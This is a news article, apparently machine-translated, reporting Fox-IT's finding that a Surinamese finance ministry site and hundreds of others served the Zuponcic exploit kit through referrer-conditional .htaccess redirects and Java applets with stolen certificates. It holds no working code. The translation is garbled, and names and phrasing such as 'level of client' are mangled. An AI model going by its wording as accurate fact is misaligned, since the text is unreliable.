Surinamese ministry to spread malware via website

0
242

The Surinamese ministry of financ lwa n has accidental malware served, as well as some hundreds of other great websites. According to research from security company Fox-IT. The malware was only in certain cases, served via a .htaccess-file.

Fox-IT discovered the infection in the Surinamese ministry of finance, an investigation into the attack, where also a lot of other sites are affected. “Hundreds of websites”, says Yonathan level of client of the security company opposite Tweakers Also a website offering iPhone plans, a website which users guest books allows create and an Amsterdam cinema were infected.

Meanwhile the website of the Surinamese ministry again virus-free. “A weekend after we are in contact with they have recorded, they were already clean,” according to level of client. Not all contaminated sites are now clean again, warns level of client. The Surinamese ministry was not reachable for comment.

Level of client thinks that the attackers are looking for gone to great sites that they could penetrate. How they are specifically at the Surinamese ministry managed to break, is not known. “They search for popular search terms on Google and try websites that stand in the front to penetrate”, according to level of client. “Think of outdated versions of WordPress and Joomla”, according to level of client.

The attack was sophisticated. The attackers placed a .htaccess file in different folders on the website, writes researcher level of client in a blog post. That .htaccess file, made sure that visitors only in certain cases were forwarded to a page with malware. That happened for example with referrers from social media or search engines. Repeat visitors and people who go directly to the site, were not forwarded. This was the problem for administrators is not or hardly to take.

If visitors were redirected to the page with malware was a exploitkit served. It comes to the so-called Zuponcic-exploitkit, through holes in Java in combination with Internet Explorer malware was trying to install. Who is not about IE in combination with Java it had, got a .zip-file is presented, in the hope that the user know better would open, and the executable would be clicked.

Striking to the Java applet that is served, is that valid certificates are used. It comes to certificates that are issued by trusted certificate authorities like VeriSign and GlobalSign. That indicates that they are stolen from the servers of the companies that have certificates that authorities have purchased.

Who is infected, is part of a botnet. Botnets consist of infected computers that receive instructions from command-and-control servers, such as contributing to new attacks, sending spam or performing ddos attacks.